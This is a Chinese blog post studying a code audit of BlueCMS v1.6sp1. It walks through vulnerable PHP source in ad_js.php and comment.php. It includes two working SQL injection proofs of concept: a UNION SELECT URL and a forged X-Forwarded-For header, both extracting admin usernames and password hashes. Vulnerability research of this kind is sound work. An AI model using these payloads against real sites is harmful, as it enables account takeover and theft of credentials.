bluecms v1.6sp1代码审计学习

最新推荐文章于 2024-01-31 21:29:38 发布

小鱼儿waha

最新推荐文章于 2024-01-31 21:29:38 发布

阅读量757

点赞数

分类专栏：代码审计文章标签： Bluecms v1.6sp1

我希望自己永远怀着一颗学习的心！

本文链接：https://blog.csdn.net/q1352483315/article/details/88916058

版权

代码审计专栏收录该内容

7 篇文章 0 订阅

订阅专栏

漏洞文件:\bluecms\ad_js.php
<?php
/**
 * [bluecms]版权所有 标准网络，保留所有权利
 * This is not a freeware, use is subject to license terms
 *
 * $Id：ad_js.php
 * $author：lucks
 */
define('IN_BLUE', true);
require_once dirname(__FILE__) . '/include/common.inc.php';

$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
	echo 'Error!';
	exit();
}

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);  // id = 1时候为空 因为我原本搭建起来里面ad什么都不存在的
var_dump($ad); // 这里打印出来看下信息


if($ad['time_set'] == 0)
{
	$ad_content = $ad['content'];  //这边 $ad_content 被赋值 $ad['content']
}
else
{
	if($ad['end_time'] < time())
	{
		$ad_content = $ad['exp_content'];  // 因为这边time()原本就大于end_time 所以这边肯定成立 那么就相当于$ad['content'] 被赋值为$ad['exp_content']
		echo '1'; // 这里是用来检验是不是time大于end_time
	}
	else
	{
		$ad_content = $ad['content'];
	}
}
$ad_content = str_replace('"', '\"',$ad_content);  // 下面的三步就是一点过滤 但是我们发现上面的$ad_id根本就是数值型所以这里的过滤没用
$ad_content = str_replace("\r", "\\r",$ad_content);
$ad_content = str_replace("\n", "\\n",$ad_content);
echo "<!--\r\ndocument.write(\"".$ad_content."\");\r\n-->\r\n";

那么这里我们知道$ad['content'] 被赋值为$ad['exp_content'] 所以我们可以构造出exp_content的字段来用$ad['content‘]显示出来

?>

构造POC：http://127.0.0.1/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,group_concat(admin_name,0x3a,pwd) from blue_admin

漏洞文件：\bluecms\comment.php  113行到114行
<?php
/**
 * [bluecms]版权所有 标准网络，保留所有权利
 * This is not a freeware, use is subject to license terms
 *
 * $Id：comment.php
 * $author：lucks
 */
define('IN_BLUE', true);
require dirname(__FILE__) . '/include/common.inc.php';
$id = !empty($_REQUEST['id']) ? intval($_REQUEST['id']) : '';
$type = intval($_REQUEST['type']);
$act = !empty($_REQUEST['act']) ? trim($_REQUEST['act']) : 'list';

$cat_nav = read_static_cache('cat_list_0');
$add_nav_list = read_static_cache('add_nav');
$bot_nav = read_static_cache('bot_nav');

$smarty->caching = false;

if($act == 'list')
{
	if(empty($id))
	{
		return false;
	}
	if($_CFG['comment_is_check'] == 1)
	{
		$condition = " and a.is_check = 1 ";
	}
	else
	{
		$condition = '';
	}
	if($type == 0)
	{
		$sql = "SELECT a.*, b.user_name, c.title 
				FROM (".table('comment')." AS a 
				LEFT JOIN ".table('user')." AS b ON a.user_id = b.user_id ) LEFT JOIN ".table('post')." AS c ON a.post_id = c.post_id 
				WHERE a.type=0 and a.post_id = ".$id.$condition." 
				ORDER BY pub_date DESC";
		$comment_list = $db->getall($sql);
		$title['post_id'] = $comment_list[0]['post_id'];
		$title['name'] = $comment_list[0]['title'];
		$title['url'] = url_rewrite('post', array('id'=>$comment_list[0]['post_id']));
	}
	elseif($type == 1)
	{
		$sql = "SELECT a.*, b.user_name, c.title 
				FROM (".table('comment')." AS a LEFT JOIN ".table('user')." AS b ON a.user_id = b.user_id) LEFT JOIN ".table('article')." AS c ON a.post_id = c.id 
				WHERE a.type=1 and a.post_id = ".$id.$condition." 
				ORDER BY pub_date DESC";
		$comment_list = $db->getall($sql);
		$title['post_id'] = $comment_list[0]['post_id'];
		$title['name'] = $comment_list[0]['title'];
		$title['url'] = url_rewrite('news', array('id'=>$comment_list[0]['post_id']));
	}
	template_assign(
		array(
			'current_act', 
			'cat_nav', 
			'add_nav_list', 
			'bot_nav', 
			'comment_list', 
			'title', 
			'user_name', 
			'url',
			'type', 
			'cat_option', 
			'area_option'
		), 
		array(
			'评论列表', 
			$cat_nav, 
			$add_nav_list, 
			$bot_nav, 
			$comment_list, 
			$title,
	  		$_SESSION['user_name'], 
	  		base64_encode($url), 
	  		$type, 
	  		get_option(1), 
	  		get_area_option(1)
	  	)
	);
	$smarty->display('comment.htm');
}
elseif($act == 'send')
{
	if(empty($id))
	{
 		return false;
 	}

 	$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
 	$mood = intval($_POST['mood']);
 	$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
 	$content = nl2br($content);
 	$type = intval($_POST['type']);
 	if(empty($content))
 	{
 		showmsg('评论内容不能为空');
 	}
 	if($_CFG['comment_is_check'] == 0)
 	{
 		$is_check = 1;
 	}
 	else
 	{
 		$is_check = 0;
 	}

 	$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) 
 			VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";  
/*
这边存在一个insert注入   getid函数的输出没有经过任何的过滤 所造成的
我们继续找到getid()这个函数的代码 位于 \bluecms\include\common.fun.php
function getip()
{
	if (getenv('HTTP_CLIENT_IP'))
	{
		$ip = getenv('HTTP_CLIENT_IP'); 
	}
	elseif (getenv('HTTP_X_FORWARDED_FOR')) 
	{ //获取客户端用代理服务器访问时的真实ip 地址
		$ip = getenv('HTTP_X_FORWARDED_FOR');
	}
	elseif (getenv('HTTP_X_FORWARDED')) 
	{ 
		$ip = getenv('HTTP_X_FORWARDED');
	}
	elseif (getenv('HTTP_FORWARDED_FOR'))
	{
		$ip = getenv('HTTP_FORWARDED_FOR'); 
	}
	elseif (getenv('HTTP_FORWARDED'))
	{
		$ip = getenv('HTTP_FORWARDED');
	}
	else
	{ 
		$ip = $_SERVER['REMOTE_ADDR'];
	}
	return $ip;
}

*/
	$db->query($sql);
 	if($type == 1)
 	{
 		$db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);
 	}
 	elseif($type == 0)
 	{
 		$db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);
 	}
	if($_CFG['comment_is_check'] == 1)
	{
		showmsg('请稍候，您的评论正在审核当中...','comment.php?id='.$id.'&type='.$type);
	}
	else
	{
		showmsg('发布评论成功','comment.php?id='.$id.'&type='.$type);
	}
}

利用poc：X-Forwarded-For: 00', '1'),('','1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin), '1281181973','99

?>

小鱼儿waha

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
bluecms v1.6sp1代码审计学习

漏洞文件:\bluecms\ad_js.php<?php/** * [bluecms]版权所有标准网络，保留所有权利 * This is not a freeware, use is subject to license terms * * $Id：ad_js.php * $author：lucks */define('IN_BLUE', true);require_o...
复制链接

扫一扫